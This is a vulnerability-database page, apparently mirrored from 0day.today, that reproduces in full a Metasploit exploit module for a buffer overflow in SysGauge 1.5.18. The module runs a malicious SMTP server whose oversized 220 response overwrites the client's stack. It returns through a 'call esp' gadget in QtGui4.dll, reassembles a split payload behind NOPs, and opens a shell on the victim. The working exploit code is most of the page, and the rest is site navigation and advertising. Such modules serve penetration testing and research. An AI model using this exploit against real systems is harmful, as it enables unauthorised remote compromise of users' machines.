Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SysGauge SMTP Validation Buffer Overflow Exploit

🗓️ 22 Mar 2017 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 20 Views

SysGauge SMTP Validation Buffer Overflow Exploit. Setup malicious SMTP server to exploit SysGauge 1.5.18 resulting in unprivileged shell

Code
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::TcpServer

  Rank = NormalRanking

  def initialize()
    super(
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
      'Description'    => %q{
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
        via its SMTP server validation. The module sends a malicious response along in the
        220 service ready response and exploits the client, resulting in an unprivileged shell.
      },
      'Author'         =>
      [
        'Chris Higgins', # msf Module -- @ch1gg1ns
        'Peter Baris'    # Initial discovery and PoC
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
      [
        [ 'EDB', '41479' ],
      ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread'
      },
      'Payload'        =>
      {
        'Space' => 306,
        'BadChars' => "\x00\x0a\x0d\x20"
      },
      'Platform'  => 'win',
      'Targets'       =>
      [
        [ 'Windows Universal',
          {
            'Offset' => 176,
            'Ret'    => 0x6527635E # call esp # QtGui4.dll
          }
        ]
      ],
      'Privileged'    => false,
      'DisclosureDate' => 'Feb 28 2017',
      'DefaultTarget' => 0
      )
    register_options(
      [
      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
      ])
  end

  def on_client_connect(c)
    # Note here that the payload must be split into two parts.
    # The payload gets jumbled in the stack so we need to split
    # and align to get it to execute correctly.
    sploit =  "220 "
    sploit << rand_text(target['Offset'])
    # Can only use the last part starting from 232 bytes in
    sploit << payload.encoded[232..-1]
    sploit << rand_text(2)
    sploit << [target.ret].pack('V')
    sploit << rand_text(12)
    sploit << make_nops(8)
    # And the first part up to 232 bytes
    sploit << payload.encoded[0..231]
    sploit << "ESMTP Sendmail \r\n"

    print_status("Client connected: " + c.peerhost)
    print_status("Sending payload...")

    c.put(sploit)
  end

end

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Mar 2017 00:00Current
6.9Medium risk
Vulners AI Score6.9
sysgaugesmtpbuffer overflowexploitmetasploittcpserverpayloadwindowsuniversaledb414790day
20